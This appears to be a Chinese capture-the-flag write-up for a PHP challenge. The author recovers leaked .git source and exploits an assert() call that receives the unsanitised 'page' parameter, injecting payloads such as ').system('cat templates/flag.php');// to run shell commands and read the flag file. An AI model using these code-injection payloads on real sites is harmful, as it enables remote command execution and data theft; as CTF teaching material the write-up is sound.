打开网页看见(猜测git源码泄露):
在URL后面加上./git发现:
使用工具GitHack进行爬取
发现源码内存在flag.php 感觉没啥用
if (isset($_GET[‘page’])) {
$page = $_GET[‘page’];
} else {
$page = “home”;
}
$file = “templates/” . $page . “.php”;
// I heard ‘…’ is dangerous!
assert(“strpos(’$file’, ‘…’) === false”) or die(“Detected hacking attempt!”);
// TODO: Make this look nice
assert(“file_exists(’$file’)”) or die(“That file doesn’t exist!”);
了解assert()函数和strpos函数的使用:
assert()函数会将读入的代码当做PHP代码来执行,这就方便了!!
进行注入,注入的思路:
首先对strpos函数进行闭合,构造一下,**page=’)**
可以把后面', '..') === false的给注释掉**(这里必须用 // 来注释)**
构造**page=').phpinfo();//**,可以得到回显
或者不注释也行,直接插入,构造page=’.phpinfo().’,也可以看见:
既然可以执行函数,那就简单了,使用system()函数(system函数详解),构造查看目录的
payload:?page='.system("ls").'或者page=').system("ls");//
前者直接显示,后者在源码中才能看见。
由于源码直接下载有,所以直接构造得到flag的payload:
?page=').system("cat templates/flag.php");//或者?page='.system("cat templates/flag.php").'
两者都需查看源码!!